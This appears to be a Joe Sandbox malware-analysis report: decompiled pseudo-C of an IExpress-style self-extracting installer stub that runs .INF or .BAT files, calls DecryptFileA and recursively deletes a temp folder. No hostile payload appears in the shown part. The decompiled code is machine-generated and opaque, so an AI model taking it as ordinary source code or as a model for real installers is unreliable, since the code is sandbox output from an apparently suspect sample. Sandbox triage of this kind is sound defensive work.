                                                                      				char _v1552;
                                                                      				CHAR* _v1556;
                                                                      				int* _v1560;
                                                                      				CHAR** _v1564;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				signed int _t48;
                                                                      				CHAR* _t53;
                                                                      				CHAR* _t54;
                                                                      				char* _t57;
                                                                      				char* _t58;
                                                                      				CHAR* _t60;
                                                                      				void* _t62;
                                                                      				signed char _t65;
                                                                      				intOrPtr _t76;
                                                                      				intOrPtr _t77;
                                                                      				unsigned int _t85;
                                                                      				CHAR* _t90;
                                                                      				CHAR* _t92;
                                                                      				char _t105;
                                                                      				char _t106;
                                                                      				CHAR** _t111;
                                                                      				CHAR* _t115;
                                                                      				intOrPtr* _t125;
                                                                      				void* _t126;
                                                                      				CHAR* _t132;
                                                                      				CHAR* _t135;
                                                                      				void* _t138;
                                                                      				void* _t139;
                                                                      				void* _t145;
                                                                      				intOrPtr* _t146;
                                                                      				char* _t148;
                                                                      				CHAR* _t151;
                                                                      				void* _t152;
                                                                      				CHAR* _t155;
                                                                      				CHAR* _t156;
                                                                      				void* _t157;
                                                                      				signed int _t158;
                                                                      
                                                                      				_t48 =  *0xf88004; // 0x644c7055
                                                                      				_v8 = _t48 ^ _t158;
                                                                      				_t108 = __ecx;
                                                                      				_v1564 = _a4;
                                                                      				_v1560 = _a8;
                                                                      				E00F81680( &_v528, 0x104, __ecx);
                                                                      				if(_v528 != 0x22) {
                                                                      					_t135 = " ";
                                                                      					_t53 =  &_v528;
                                                                      				} else {
                                                                      					_t135 = "\"";
                                                                      					_t53 =  &_v527;
                                                                      				}
                                                                      				_t111 =  &_v1556;
                                                                      				_v1556 = _t53;
                                                                      				_t54 = E00F81A84(_t111, _t135);
                                                                      				_t156 = _v1556;
                                                                      				_t151 = _t54;
                                                                      				if(_t156 == 0) {
                                                                      					L12:
                                                                      					_push(_t111);
                                                                      					E00F81781( &_v268, 0x104, _t111, "C:\Users\hardz\AppData\Local\Temp\IXP001.TMP\");
                                                                      					E00F8658A( &_v268, 0x104, _t156);
                                                                      					goto L13;
                                                                      				} else {
                                                                      					_t132 = _t156;
                                                                      					_t148 =  &(_t132[1]);
                                                                      					do {
                                                                      						_t105 =  *_t132;
                                                                      						_t132 =  &(_t132[1]);
                                                                      					} while (_t105 != 0);
                                                                      					_t111 = _t132 - _t148;
                                                                      					if(_t111 < 3) {
                                                                      						goto L12;
                                                                      					}
                                                                      					_t106 = _t156[1];
                                                                      					if(_t106 != 0x3a || _t156[2] != 0x5c) {
                                                                      						if( *_t156 != 0x5c || _t106 != 0x5c) {
                                                                      							goto L12;
                                                                      						} else {
                                                                      							goto L11;
                                                                      						}
                                                                      					} else {
                                                                      						L11:
                                                                      						E00F81680( &_v268, 0x104, _t156);
                                                                      						L13:
                                                                      						_t138 = 0x2e;
                                                                      						_t57 = E00F866C8(_t156, _t138);
                                                                      						if(_t57 == 0 || CompareStringA(0x7f, 1, _t57, 0xffffffff, ".INF", 0xffffffff) != 0) {
                                                                      							_t139 = 0x2e;
                                                                      							_t115 = _t156;
                                                                      							_t58 = E00F866C8(_t115, _t139);
                                                                      							if(_t58 == 0 || CompareStringA(0x7f, 1, _t58, 0xffffffff, ".BAT", 0xffffffff) != 0) {
                                                                      								_t156 = LocalAlloc(0x40, 0x400);
                                                                      								if(_t156 == 0) {
                                                                      									goto L43;
                                                                      								}
                                                                      								_t65 = GetFileAttributesA( &_v268); // executed
                                                                      								if(_t65 == 0xffffffff || (_t65 & 0x00000010) != 0) {
                                                                      									E00F81680( &_v1552, 0x400, _t108);
                                                                      								} else {
                                                                      									_push(_t115);
                                                                      									_t108 = 0x400;
                                                                      									E00F81781( &_v1552, 0x400, _t115,  &_v268);
                                                                      									if(_t151 != 0 &&  *_t151 != 0) {
                                                                      										E00F816B3( &_v1552, 0x400, " ");
                                                                      										E00F816B3( &_v1552, 0x400, _t151);
                                                                      									}
                                                                      								}
                                                                      								_t140 = _t156;
                                                                      								 *_t156 = 0;
                                                                      								E00F82AAC( &_v1552, _t156, _t156);
                                                                      								goto L53;
                                                                      							} else {
                                                                      								_t108 = "Command.com /c %s";
                                                                      								_t125 = "Command.com /c %s";
                                                                      								_t145 = _t125 + 1;
                                                                      								do {
                                                                      									_t76 =  *_t125;
                                                                      									_t125 = _t125 + 1;
                                                                      								} while (_t76 != 0);
                                                                      								_t126 = _t125 - _t145;
                                                                      								_t146 =  &_v268;
                                                                      								_t157 = _t146 + 1;
                                                                      								do {
                                                                      									_t77 =  *_t146;
                                                                      									_t146 = _t146 + 1;
                                                                      								} while (_t77 != 0);
                                                                      								_t140 = _t146 - _t157;
                                                                      								_t154 = _t126 + 8 + _t146 - _t157;
                                                                      								_t156 = LocalAlloc(0x40, _t126 + 8 + _t146 - _t157);
                                                                      								if(_t156 != 0) {
                                                                      									E00F8171E(_t156, _t154, "Command.com /c %s",  &_v268);
                                                                      									goto L53;
                                                                      								}
                                                                      								goto L43;
                                                                      							}
                                                                      						} else {
                                                                      							_t85 = GetFileAttributesA( &_v268);
                                                                      							if(_t85 == 0xffffffff || ( !(_t85 >> 4) & 0x00000001) == 0) {
                                                                      								_t140 = 0x525;
                                                                      								_push(0);
                                                                      								_push(0x10);
                                                                      								_push(0);
                                                                      								_t60 =  &_v268;
                                                                      								goto L35;
                                                                      							} else {
                                                                      								_t140 = "[";
                                                                      								_v1556 = _t151;
                                                                      								_t90 = E00F81A84( &_v1556, "[");
                                                                      								if(_t90 != 0) {
                                                                      									if( *_t90 != 0) {
                                                                      										_v1556 = _t90;
                                                                      									}
                                                                      									_t140 = "]";
                                                                      									E00F81A84( &_v1556, "]");
                                                                      								}
                                                                      								_t156 = LocalAlloc(0x40, 0x200);
                                                                      								if(_t156 == 0) {
                                                                      									L43:
                                                                      									_t60 = 0;
                                                                      									_t140 = 0x4b5;
                                                                      									_push(0);
                                                                      									_push(0x10);
                                                                      									_push(0);
                                                                      									L35:
                                                                      									_push(_t60);
                                                                      									E00F844B9(0, _t140);
                                                                      									_t62 = 0;
                                                                      									goto L54;
                                                                      								} else {
                                                                      									_t155 = _v1556;
                                                                      									_t92 = _t155;
                                                                      									if( *_t155 == 0) {
                                                                      										_t92 = "DefaultInstall";
                                                                      									}
                                                                      									 *0xf89120 = GetPrivateProfileIntA(_t92, "Reboot", 0,  &_v268);
                                                                      									 *_v1560 = 1;
                                                                      									if(GetPrivateProfileStringA("Version", "AdvancedINF", 0xf81140, _t156, 8,  &_v268) == 0) {
                                                                      										 *0xf89a34 =  *0xf89a34 & 0xfffffffb;
                                                                      										if( *0xf89a40 != 0) {
                                                                      											_t108 = "setupapi.dll";
                                                                      										} else {
                                                                      											_t108 = "setupx.dll";
                                                                      											GetShortPathNameA( &_v268,  &_v268, 0x104);
                                                                      										}
                                                                      										if( *_t155 == 0) {
                                                                      											_t155 = "DefaultInstall";
                                                                      										}
                                                                      										_push( &_v268);
                                                                      										_push(_t155);
                                                                      										E00F8171E(_t156, 0x200, "rundll32.exe %s,InstallHinfSection %s 128 %s", _t108);
                                                                      									} else {
                                                                      										 *0xf89a34 =  *0xf89a34 | 0x00000004;
                                                                      										if( *_t155 == 0) {
                                                                      											_t155 = "DefaultInstall";
                                                                      										}
                                                                      										E00F81680(_t108, 0x104, _t155);
                                                                      										_t140 = 0x200;
                                                                      										E00F81680(_t156, 0x200,  &_v268);
                                                                      									}
                                                                      									L53:
                                                                      									_t62 = 1;
                                                                      									 *_v1564 = _t156;
                                                                      									L54:
                                                                      									_pop(_t152);
                                                                      									return E00F86CE0(_t62, _t108, _v8 ^ _t158, _t140, _t152, _t156);
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      					}
                                                                      				}
                                                                      			}














































                                                                      0x00f81af3
                                                                      0x00f81afa
                                                                      0x00f81b07
                                                                      0x00f81b09
                                                                      0x00f81b1a
                                                                      0x00f81b20
                                                                      0x00f81b2c
                                                                      0x00f81b3b
                                                                      0x00f81b40
                                                                      0x00f81b2e
                                                                      0x00f81b2e
                                                                      0x00f81b33
                                                                      0x00f81b33
                                                                      0x00f81b46
                                                                      0x00f81b4c
                                                                      0x00f81b52
                                                                      0x00f81b57
                                                                      0x00f81b5d
                                                                      0x00f81b61
                                                                      0x00f81b9f
                                                                      0x00f81b9f
                                                                      0x00f81bb1
                                                                      0x00f81bc2
                                                                      0x00000000
                                                                      0x00f81b63
                                                                      0x00f81b63
                                                                      0x00f81b65
                                                                      0x00f81b68
                                                                      0x00f81b68
                                                                      0x00f81b6a
                                                                      0x00f81b6b
                                                                      0x00f81b6f
                                                                      0x00f81b74
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f81b76
                                                                      0x00f81b7b
                                                                      0x00f81b86
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f81b8c
                                                                      0x00f81b8c
                                                                      0x00f81b98
                                                                      0x00f81bc7
                                                                      0x00f81bc9
                                                                      0x00f81bcc
                                                                      0x00f81bd3
                                                                      0x00f81d75
                                                                      0x00f81d76
                                                                      0x00f81d78
                                                                      0x00f81d7f
                                                                      0x00f81e05
                                                                      0x00f81e09
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f81e12
                                                                      0x00f81e1b
                                                                      0x00f81e73
                                                                      0x00f81e21
                                                                      0x00f81e21
                                                                      0x00f81e28
                                                                      0x00f81e37
                                                                      0x00f81e3e
                                                                      0x00f81e52
                                                                      0x00f81e60
                                                                      0x00f81e60
                                                                      0x00f81e3e
                                                                      0x00f81e79
                                                                      0x00f81e7b
                                                                      0x00f81e84
                                                                      0x00000000
                                                                      0x00f81d9b
                                                                      0x00f81d9b
                                                                      0x00f81da0
                                                                      0x00f81da2
                                                                      0x00f81da5
                                                                      0x00f81da5
                                                                      0x00f81da7
                                                                      0x00f81da8
                                                                      0x00f81dac
                                                                      0x00f81dae
                                                                      0x00f81db4
                                                                      0x00f81db7
                                                                      0x00f81db7
                                                                      0x00f81db9
                                                                      0x00f81dba
                                                                      0x00f81dbe
                                                                      0x00f81dc3
                                                                      0x00f81dce
                                                                      0x00f81dd2
                                                                      0x00f81deb
                                                                      0x00000000
                                                                      0x00f81df0
                                                                      0x00000000
                                                                      0x00f81dd2
                                                                      0x00f81bf7
                                                                      0x00f81bfe
                                                                      0x00f81c07
                                                                      0x00f81d55
                                                                      0x00f81d5a
                                                                      0x00f81d5b
                                                                      0x00f81d5d
                                                                      0x00f81d5e
                                                                      0x00000000
                                                                      0x00f81c1b
                                                                      0x00f81c1b
                                                                      0x00f81c20
                                                                      0x00f81c2c
                                                                      0x00f81c33
                                                                      0x00f81c38
                                                                      0x00f81c3a
                                                                      0x00f81c3a
                                                                      0x00f81c40
                                                                      0x00f81c4b
                                                                      0x00f81c4b
                                                                      0x00f81c5d
                                                                      0x00f81c61
                                                                      0x00f81dd4
                                                                      0x00f81dd4
                                                                      0x00f81dd6
                                                                      0x00f81ddb
                                                                      0x00f81ddc
                                                                      0x00f81dde
                                                                      0x00f81d64
                                                                      0x00f81d64
                                                                      0x00f81d67
                                                                      0x00f81d6c
                                                                      0x00000000
                                                                      0x00f81c67
                                                                      0x00f81c67
                                                                      0x00f81c6d
                                                                      0x00f81c72
                                                                      0x00f81c74
                                                                      0x00f81c74
                                                                      0x00f81c8e
                                                                      0x00f81c99
                                                                      0x00f81cc0
                                                                      0x00f81cf8
                                                                      0x00f81d07
                                                                      0x00f81d23
                                                                      0x00f81d09
                                                                      0x00f81d14
                                                                      0x00f81d1b
                                                                      0x00f81d1b
                                                                      0x00f81d2b
                                                                      0x00f81d2d
                                                                      0x00f81d2d
                                                                      0x00f81d38
                                                                      0x00f81d39
                                                                      0x00f81d46
                                                                      0x00f81cc2
                                                                      0x00f81cc2
                                                                      0x00f81ccc
                                                                      0x00f81cce
                                                                      0x00f81cce
                                                                      0x00f81cdb
                                                                      0x00f81ce6
                                                                      0x00f81cee
                                                                      0x00f81cee
                                                                      0x00f81e89
                                                                      0x00f81e91
                                                                      0x00f81e92
                                                                      0x00f81e94
                                                                      0x00f81e97
                                                                      0x00f81ea4
                                                                      0x00f81ea4
                                                                      0x00f81c61
                                                                      0x00f81c07
                                                                      0x00f81bd3
                                                                      0x00f81b7b

                                                                      APIs
                                                                      • CompareStringA.KERNEL32(0000007F,00000001,00000000,000000FF,.INF,000000FF,?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,?,00000000,00000001,00000000), ref: 00F81BE7
                                                                      • GetFileAttributesA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,?,00000000,00000001,00000000), ref: 00F81BFE
                                                                      • LocalAlloc.KERNEL32(00000040,00000200,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,?,00000000,00000001,00000000), ref: 00F81C57
                                                                      • GetPrivateProfileIntA.KERNEL32 ref: 00F81C88
                                                                      • GetPrivateProfileStringA.KERNEL32(Version,AdvancedINF,00F81140,00000000,00000008,?), ref: 00F81CB8
                                                                      • GetShortPathNameA.KERNEL32 ref: 00F81D1B
                                                                        • Part of subcall function 00F844B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00F84518
                                                                        • Part of subcall function 00F844B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00F84554
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.400535414.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                      • Associated: 00000001.00000002.400528798.0000000000F80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400545316.0000000000F88000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_f80000_bmMg.jbxd
                                                                      Similarity
                                                                      • API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
                                                                      • String ID: "$.BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
                                                                      • API String ID: 383838535-2145762761
                                                                      • Opcode ID: b4df5650c66f4f732930e2488c914acf66414070d98e684b096a5600e56da6d3
                                                                      • Instruction ID: 66f4a994bea8bdc0173ff2bc56a85e3c9b5e05fac5a9d721caae0b54b5a0c35c
                                                                      • Opcode Fuzzy Hash: b4df5650c66f4f732930e2488c914acf66414070d98e684b096a5600e56da6d3
                                                                      • Instruction Fuzzy Hash: EAA13871E002185BEB20BB24CC49BFA776DFB81320F144795E555A32D1EBB49E87EB50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 406 f82f1d-f82f3d 407 f82f6c-f82f73 call f85164 406->407 408 f82f3f-f82f46 406->408 416 f82f79-f82f80 call f855a0 407->416 417 f83041 407->417 410 f82f48 call f851e5 408->410 411 f82f5f-f82f66 call f83a3f 408->411 418 f82f4d-f82f4f 410->418 411->407 411->417 416->417 424 f82f86-f82fbe GetSystemDirectoryA call f8658a LoadLibraryA 416->424 420 f83043-f83053 call f86ce0 417->420 418->417 421 f82f55-f82f5d 418->421 421->407 421->411 428 f82fc0-f82fd4 GetProcAddress 424->428 429 f82ff7-f83004 FreeLibrary 424->429 428->429 432 f82fd6-f82fee DecryptFileA 428->432 430 f83006-f8300c 429->430 431 f83017-f83024 SetCurrentDirectoryA 429->431 430->431 433 f8300e call f8621e 430->433 434 f83054-f8305a 431->434 435 f83026-f8303c call f844b9 call f86285 431->435 432->429 446 f82ff0-f82ff5 432->446 444 f83013-f83015 433->444 436 f8305c call f83b26 434->436 437 f83065-f8306c 434->437 435->417 447 f83061-f83063 436->447 442 f8307c-f83089 437->442 443 f8306e-f83075 call f8256d 437->443 449 f8308b-f83091 442->449 450 f830a1-f830a9 442->450 452 f8307a 443->452 444->417 444->431 446->429 447->417 447->437 449->450 453 f83093 call f83ba2 449->453 455 f830ab-f830ad 450->455 456 f830b4-f830b7 450->456 452->442 460 f83098-f8309a 453->460 455->456 458 f830af call f84169 455->458 456->420 458->456 460->417 461 f8309c 460->461 461->450
                                                                      C-Code - Quality: 82%
                                                                      			E00F82F1D(void* __ecx, int __edx) {
                                                                      				signed int _v8;
                                                                      				char _v272;
                                                                      				_Unknown_base(*)()* _v276;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				signed int _t9;
                                                                      				void* _t11;
                                                                      				struct HWND__* _t12;
                                                                      				void* _t14;
                                                                      				int _t21;
                                                                      				signed int _t22;
                                                                      				signed int _t25;
                                                                      				intOrPtr* _t26;
                                                                      				signed int _t27;
                                                                      				void* _t30;
                                                                      				_Unknown_base(*)()* _t31;
                                                                      				void* _t34;
                                                                      				struct HINSTANCE__* _t36;
                                                                      				intOrPtr _t41;
                                                                      				intOrPtr* _t44;
                                                                      				signed int _t46;
                                                                      				int _t47;
                                                                      				void* _t58;
                                                                      				void* _t59;
                                                                      
                                                                      				_t43 = __edx;
                                                                      				_t9 =  *0xf88004; // 0x644c7055
                                                                      				_v8 = _t9 ^ _t46;
                                                                      				if( *0xf88a38 != 0) {
                                                                      					L5:
                                                                      					_t11 = E00F85164(_t52);
                                                                      					_t53 = _t11;
                                                                      					if(_t11 == 0) {
                                                                      						L16:
                                                                      						_t12 = 0;
                                                                      						L17:
                                                                      						return E00F86CE0(_t12, _t36, _v8 ^ _t46, _t43, _t44, _t45);
                                                                      					}
                                                                      					_t14 = E00F855A0(_t53); // executed
                                                                      					if(_t14 == 0) {
                                                                      						goto L16;
                                                                      					} else {
                                                                      						_t45 = 0x105;
                                                                      						GetSystemDirectoryA( &_v272, 0x105);
                                                                      						_t43 = 0x105;
                                                                      						_t40 =  &_v272;
                                                                      						E00F8658A( &_v272, 0x105, "advapi32.dll");
                                                                      						_t36 = LoadLibraryA( &_v272);
                                                                      						_t44 = 0;
                                                                      						if(_t36 != 0) {
                                                                      							_t31 = GetProcAddress(_t36, "DecryptFileA");
                                                                      							_v276 = _t31;
                                                                      							if(_t31 != 0) {
                                                                      								_t45 = _t47;
                                                                      								_t40 = _t31;
                                                                      								 *0xf8a288("C:\Users\hardz\AppData\Local\Temp\IXP001.TMP\", 0); // executed
                                                                      								_v276();
                                                                      								if(_t47 != _t47) {
                                                                      									_t40 = 4;
                                                                      									asm("int 0x29");
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      						FreeLibrary(_t36);
                                                                      						_t58 =  *0xf88a24 - _t44; // 0x0
                                                                      						if(_t58 != 0) {
                                                                      							L14:
                                                                      							_t21 = SetCurrentDirectoryA("C:\Users\hardz\AppData\Local\Temp\IXP001.TMP\"); // executed
                                                                      							if(_t21 != 0) {
                                                                      								__eflags =  *0xf88a2c - _t44; // 0x0
                                                                      								if(__eflags != 0) {
                                                                      									L20:
                                                                      									__eflags =  *0xf88d48 & 0x000000c0;
                                                                      									if(( *0xf88d48 & 0x000000c0) == 0) {
                                                                      										_t41 =  *0xf89a40; // 0x3, executed
                                                                      										_t26 = E00F8256D(_t41); // executed
                                                                      										_t44 = _t26;
                                                                      									}
                                                                      									_t22 =  *0xf88a24; // 0x0
                                                                      									 *0xf89a44 = _t44;
                                                                      									__eflags = _t22;
                                                                      									if(_t22 != 0) {
                                                                      										L26:
                                                                      										__eflags =  *0xf88a38;
                                                                      										if( *0xf88a38 == 0) {
                                                                      											__eflags = _t22;
                                                                      											if(__eflags == 0) {
                                                                      												E00F84169(__eflags);
                                                                      											}
                                                                      										}
                                                                      										_t12 = 1;
                                                                      										goto L17;
                                                                      									} else {
                                                                      										__eflags =  *0xf89a30 - _t22; // 0x0
                                                                      										if(__eflags != 0) {
                                                                      											goto L26;
                                                                      										}
                                                                      										_t25 = E00F83BA2(); // executed
                                                                      										__eflags = _t25;
                                                                      										if(_t25 == 0) {
                                                                      											goto L16;
                                                                      										}
                                                                      										_t22 =  *0xf88a24; // 0x0
                                                                      										goto L26;
                                                                      									}
                                                                      								}
                                                                      								_t27 = E00F83B26(_t40, _t44);
                                                                      								__eflags = _t27;
                                                                      								if(_t27 == 0) {
                                                                      									goto L16;
                                                                      								}
                                                                      								goto L20;
                                                                      							}
                                                                      							_t43 = 0x4bc;
                                                                      							E00F844B9(0, 0x4bc, _t44, _t44, 0x10, _t44);
                                                                      							 *0xf89124 = E00F86285();
                                                                      							goto L16;
                                                                      						}
                                                                      						_t59 =  *0xf89a30 - _t44; // 0x0
                                                                      						if(_t59 != 0) {
                                                                      							goto L14;
                                                                      						}
                                                                      						_t30 = E00F8621E(); // executed
                                                                      						if(_t30 == 0) {
                                                                      							goto L16;
                                                                      						}
                                                                      						goto L14;
                                                                      					}
                                                                      				}
                                                                      				_t49 =  *0xf88a24;
                                                                      				if( *0xf88a24 != 0) {
                                                                      					L4:
                                                                      					_t34 = E00F83A3F(_t51);
                                                                      					_t52 = _t34;
                                                                      					if(_t34 == 0) {
                                                                      						goto L16;
                                                                      					}
                                                                      					goto L5;
                                                                      				}
                                                                      				if(E00F851E5(_t49) == 0) {
                                                                      					goto L16;
                                                                      				}
                                                                      				_t51 =  *0xf88a38;
                                                                      				if( *0xf88a38 != 0) {
                                                                      					goto L5;
                                                                      				}
                                                                      				goto L4;
                                                                      			}




























                                                                      0x00f82f1d
                                                                      0x00f82f28
                                                                      0x00f82f2f
                                                                      0x00f82f3d
                                                                      0x00f82f6c
                                                                      0x00f82f6c
                                                                      0x00f82f71
                                                                      0x00f82f73
                                                                      0x00f83041
                                                                      0x00f83041
                                                                      0x00f83043
                                                                      0x00f83053
                                                                      0x00f83053
                                                                      0x00f82f79
                                                                      0x00f82f80
                                                                      0x00000000
                                                                      0x00f82f86
                                                                      0x00f82f86
                                                                      0x00f82f93
                                                                      0x00f82f9e
                                                                      0x00f82fa0
                                                                      0x00f82fa6
                                                                      0x00f82fb8
                                                                      0x00f82fba
                                                                      0x00f82fbe
                                                                      0x00f82fc6
                                                                      0x00f82fcc
                                                                      0x00f82fd4
                                                                      0x00f82fd6
                                                                      0x00f82fd8
                                                                      0x00f82fe0
                                                                      0x00f82fe6
                                                                      0x00f82fee
                                                                      0x00f82ff0
                                                                      0x00f82ff5
                                                                      0x00f82ff5
                                                                      0x00f82fee
                                                                      0x00f82fd4
                                                                      0x00f82ff8
                                                                      0x00f82ffe
                                                                      0x00f83004
                                                                      0x00f83017
                                                                      0x00f8301c
                                                                      0x00f83024
                                                                      0x00f83054
                                                                      0x00f8305a
                                                                      0x00f83065
                                                                      0x00f83065
                                                                      0x00f8306c
                                                                      0x00f8306e
                                                                      0x00f83075
                                                                      0x00f8307a
                                                                      0x00f8307a
                                                                      0x00f8307c
                                                                      0x00f83081
                                                                      0x00f83087
                                                                      0x00f83089
                                                                      0x00f830a1
                                                                      0x00f830a1
                                                                      0x00f830a9
                                                                      0x00f830ab
                                                                      0x00f830ad
                                                                      0x00f830af
                                                                      0x00f830af
                                                                      0x00f830ad
                                                                      0x00f830b6
                                                                      0x00000000
                                                                      0x00f8308b
                                                                      0x00f8308b
                                                                      0x00f83091
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f83093
                                                                      0x00f83098
                                                                      0x00f8309a
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f8309c
                                                                      0x00000000
                                                                      0x00f8309c
                                                                      0x00f83089
                                                                      0x00f8305c
                                                                      0x00f83061
                                                                      0x00f83063
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f83063
                                                                      0x00f8302b
                                                                      0x00f83032
                                                                      0x00f8303c
                                                                      0x00000000
                                                                      0x00f8303c
                                                                      0x00f83006
                                                                      0x00f8300c
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f8300e
                                                                      0x00f83015
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f83015
                                                                      0x00f82f80
                                                                      0x00f82f3f
                                                                      0x00f82f46
                                                                      0x00f82f5f
                                                                      0x00f82f5f
                                                                      0x00f82f64
                                                                      0x00f82f66
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f82f66
                                                                      0x00f82f4f
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f82f55
                                                                      0x00f82f5d
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000

                                                                      APIs
                                                                      • GetSystemDirectoryA.KERNEL32 ref: 00F82F93
                                                                      • LoadLibraryA.KERNEL32(?,advapi32.dll), ref: 00F82FB2
                                                                      • GetProcAddress.KERNEL32(00000000,DecryptFileA), ref: 00F82FC6
                                                                      • DecryptFileA.ADVAPI32 ref: 00F82FE6
                                                                      • FreeLibrary.KERNEL32(00000000), ref: 00F82FF8
                                                                      • SetCurrentDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 00F8301C
                                                                        • Part of subcall function 00F851E5: LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00F82F4D,?,00000002,00000000), ref: 00F85201
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.400535414.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                      • Associated: 00000001.00000002.400528798.0000000000F80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400545316.0000000000F88000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_f80000_bmMg.jbxd
                                                                      Similarity
                                                                      • API ID: DirectoryLibrary$AddressAllocCurrentDecryptFileFreeLoadLocalProcSystem
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$DecryptFileA$advapi32.dll
                                                                      • API String ID: 2126469477-4070797333
                                                                      • Opcode ID: bcbccdad3ed7132603c9194ae5d319402f439655927c5c6351db533c50700f03
                                                                      • Instruction ID: f20763a2e5a02874e9fa1203687ee84706cf32ad9a8377525767a4db6e61fc56
                                                                      • Opcode Fuzzy Hash: bcbccdad3ed7132603c9194ae5d319402f439655927c5c6351db533c50700f03
                                                                      • Instruction Fuzzy Hash: 0341AB31E006095BDB34BB719C496FA33A8EB44F69F040566E941C21A1EF7CDE81FB51
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      C-Code - Quality: 86%
                                                                      			E00F82390(CHAR* __ecx) {
                                                                      				signed int _v8;
                                                                      				char _v276;
                                                                      				char _v280;
                                                                      				char _v284;
                                                                      				struct _WIN32_FIND_DATAA _v596;
                                                                      				struct _WIN32_FIND_DATAA _v604;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				signed int _t21;
                                                                      				int _t36;
                                                                      				void* _t46;
                                                                      				void* _t62;
                                                                      				void* _t63;
                                                                      				CHAR* _t65;
                                                                      				void* _t66;
                                                                      				signed int _t67;
                                                                      				signed int _t69;
                                                                      
                                                                      				_t69 = (_t67 & 0xfffffff8) - 0x254;
                                                                      				_t21 =  *0xf88004; // 0x644c7055
                                                                      				_t22 = _t21 ^ _t69;
                                                                      				_v8 = _t21 ^ _t69;
                                                                      				_t65 = __ecx;
                                                                      				if(__ecx == 0 ||  *((char*)(__ecx)) == 0) {
                                                                      					L10:
                                                                      					_pop(_t62);
                                                                      					_pop(_t66);
                                                                      					_pop(_t46);
                                                                      					return E00F86CE0(_t22, _t46, _v8 ^ _t69, _t58, _t62, _t66);
                                                                      				} else {
                                                                      					E00F81680( &_v276, 0x104, __ecx);
                                                                      					_t58 = 0x104;
                                                                      					E00F816B3( &_v280, 0x104, "*");
                                                                      					_t22 = FindFirstFileA( &_v284,  &_v604); // executed
                                                                      					_t63 = _t22;
                                                                      					if(_t63 == 0xffffffff) {
                                                                      						goto L10;
                                                                      					} else {
                                                                      						goto L3;
                                                                      					}
                                                                      					do {
                                                                      						L3:
                                                                      						_t58 = 0x104;
                                                                      						E00F81680( &_v276, 0x104, _t65);
                                                                      						if((_v604.ftCreationTime & 0x00000010) == 0) {
                                                                      							_t58 = 0x104;
                                                                      							E00F816B3( &_v276, 0x104,  &(_v596.dwReserved1));
                                                                      							SetFileAttributesA( &_v280, 0x80);
                                                                      							DeleteFileA( &_v280);
                                                                      						} else {
                                                                      							if(lstrcmpA( &(_v596.dwReserved1), ".") != 0 && lstrcmpA( &(_v596.cFileName), "..") != 0) {
                                                                      								E00F816B3( &_v276, 0x104,  &(_v596.cFileName));
                                                                      								_t58 = 0x104;
                                                                      								E00F8658A( &_v280, 0x104, 0xf81140);
                                                                      								E00F82390( &_v284);
                                                                      							}
                                                                      						}
                                                                      						_t36 = FindNextFileA(_t63,  &_v596); // executed
                                                                      					} while (_t36 != 0);
                                                                      					FindClose(_t63); // executed
                                                                      					_t22 = RemoveDirectoryA(_t65); // executed
                                                                      					goto L10;
                                                                      				}
                                                                      			}





















                                                                      0x00f82398
                                                                      0x00f8239e
                                                                      0x00f823a3
                                                                      0x00f823a5
                                                                      0x00f823ae
                                                                      0x00f823b3
                                                                      0x00f824cb
                                                                      0x00f824d2
                                                                      0x00f824d3
